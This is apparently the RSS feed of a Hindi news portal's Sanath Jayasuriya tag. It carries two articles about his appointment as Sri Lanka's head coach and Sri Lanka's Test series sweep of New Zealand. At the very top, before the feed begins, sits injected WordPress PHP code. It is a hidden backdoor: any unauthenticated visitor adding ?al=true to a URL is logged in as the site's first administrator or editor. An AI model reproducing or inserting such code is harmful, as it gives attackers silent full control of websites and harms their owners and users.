// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Sanath Jayasuriya – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Mon, 07 Oct 2024 15:20:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 श्रीलंका क्रिकेट ने सनथ जयसूर्या को बनाया पुरुष टीम का हेड कोच https://pratyushaashakinayikiran.com/?p=81141 Mon, 07 Oct 2024 15:20:00 +0000 https://pratyushaashakinayikiran.com/?p=81141 कोलंबो
पूर्व कप्तान सनथ जयसूर्या को श्रीलंका पुरुष क्रिकेट टीम का मुख्य कोच नियुक्त किया गया है। श्रीलंका के पूर्व ओपनर रह चुके जयसूर्या के मार्गदर्शन में टीम ने खासकर भारत, इंग्लैंड और न्यूजीलैंड के खिलाफ शानदार प्रदर्शन किया था। जयसूर्या की नियुक्ति 1 अक्टूबर 2024 से शुरू हो गई है और वह 31 मार्च 2026 तक इस पद पर रहेंगे। श्रीलंका क्रिकेट के बयान के अनुसार, “श्रीलंका क्रिकेट की कार्यकारी समिति ने यह निर्णय हाल के भारत, इंग्लैंड और न्यूजीलैंड दौरे पर टीम के अच्छे प्रदर्शन को देखते हुए लिया, जहां जयसूर्या अंतरिम मुख्य कोच के रूप में टीम के साथ थे।” मुख्य कोच के रूप में जयसूर्या की पहली जिम्मेदारी वेस्टइंडीज के खिलाफ होने वाले सीमित ओवरों के मैच होंगे, जो दांबुला और पल्लेकेले में खेले जाएंगे।

जयसूर्या पहले श्रीलंका क्रिकेट के सलाहकार रह चुके हैं। उनको पहली बार जुलाई में अंतरिम मुख्य कोच नियुक्त किया गया था। पिछले कुछ महीनों में जयसूर्या की देखरेख में, श्रीलंका ने 27 साल बाद भारत के खिलाफ पहली द्विपक्षीय वनडे सीरीज जीती, 10 साल में पहली बार इंग्लैंड को उनकी धरती पर टेस्ट मैच में हराया, और हाल ही में न्यूजीलैंड को घरेलू टेस्ट में 2-0 से हराया।

1991 से 2007 तक जयसूर्या ने 110 टेस्ट मैच खेले, जिसमें उन्होंने 40.07 की औसत से 6973 रन बनाए, जिसमें 14 शतक और 31 अर्धशतक शामिल हैं। 445 वनडे मैचों में उन्होंने 13,430 रन बनाए, 32.36 की औसत से 28 शतक और 68 अर्धशतक लगाए। 1996 के विश्व कप में उन्होंने श्रीलंका की जीत में अहम भूमिका निभाई थी।

जयसूर्या इसके अलावा एक शानदार गेंदबाज भी थे। बाएं हाथ से स्पिन गेंदबाजी करते हुए उन्होंने टेस्ट मैचों में 98 और वनडे मैचों में 323 विकेट लिए हैं। वनडे में वह दुनिया के महानतम ऑलराउंडर में एक हैं। जयसूर्या ने अपने करियर में 31 टी20 अंतरराष्ट्रीय मैच भी खेले हैं। वह इंडियन प्रीमियर लीग (आईपीएल) में भी 30 मैच खेल चुके हैं।

 

]]>
सनथ जयसूर्या की कोचिंग में श्रीलंका क्रिकेट टीम के नए युग की शुरुआत https://pratyushaashakinayikiran.com/?p=77260 Sun, 29 Sep 2024 20:20:00 +0000 https://pratyushaashakinayikiran.com/?p=77260 कोलंबो.
श्रीलंका क्रिकेट टीम ने न्यूजीलैंड को घरेलू टेस्ट सीरीज में 2-0 से क्लीन स्वीप कर दिया है। श्रीलंका क्रिकेट टीम ने पहले टेस्ट में कीवी टीम को 63 रनों से हराने के बाद दूसरे टेस्ट में एक पारी और 154 रनों की जीत हासिल की। इसके साथ ही श्रीलंका ने न्यूजीलैंड को 15 साल बार टेस्ट सीरीज में मात दी है।

श्रीलंकाई टीम का यह प्रदर्शन पिछले कुछ समय से कमाल की निरंतरता दिखा रहा है। जब से श्रीलंका के पूर्व ओपनर और दिग्गज बाएं हाथ के बल्लेबाज सनथ जयसूर्या ने अपनी टीम की कोचिंग की कमान संभाली है, तब से टीम का प्रदर्शन शानदार रहा है। श्रीलंका ने इस दौरान भारत को वनडे सीरीज में हराया, उसके बाद इंग्लैंड को उसकी ही धरती पर टेस्ट मैच में मात दी और अब न्यूजीलैंड के खिलाफ टेस्ट सीरीज जीत ली है।

ताजा मैच में कामिंदु मेंडिस को ‘प्लेयर ऑफ द मैच अवॉर्ड’ मिला है। उन्होंने पहली पारी में शानदार 182 रन बनाए थे। इसके अलावा बाएं हाथ के स्पिन गेंदबाज प्रभात जयसूर्या को ‘प्लेयर ऑफ द सीरीज’ दिया गया है। सनथ जयसूर्या ने अपनी बैटिंग के दौरान जिस तरह से क्रिकेट की दुनिया में नए मानक स्थापित किए थे, उसी तरह से उनकी कोचिंग में श्रीलंकाई क्रिकेट के एक नए युग की शुरुआत दिखाई दे रही है। श्रीलंका क्रिकेट बोर्ड ने जयसूर्या का अनुबंध एक और साल के लिए बढ़ा दिया है।

मौजूदा जीत के बाद श्रीलंका क्रिकेट टीम 55.56 प्रतिशत पीसीटी के साथ विश्व टेस्ट चैंपियनशिप अंक तालिका में तीसरे स्थान पर पहुंच गई है। इस तालिका में 71.67 पीसीटी के साथ भारत नंबर एक पर है। ऑस्ट्रेलिया की टीम 62.50 पीसीटी के साथ नंबर दो पर है। भारत ने अभी तक दोनों विश्व टेस्ट चैंपियनशिप फाइनल खेले हैं।

दूसरी ओर न्यूजीलैंड के नाम भी एक अनचाहा रिकॉर्ड जुड़ गया है। यह टीम विश्व टेस्ट चैंपियनशिप के इतिहास में अब तक एक भी बार विदेशी धरती पर टेस्ट सीरीज नहीं जीत पाई है। यह हैरान करने वाला तथ्य है क्योंकि न्यूजीलैंड पहली विश्व टेस्ट चैंपियनशिप को जीत चुका है। जब उन्होंने भारत को हराकर इस चैंपियनशिप का उद्घाटन संस्करण जीता था।

]]>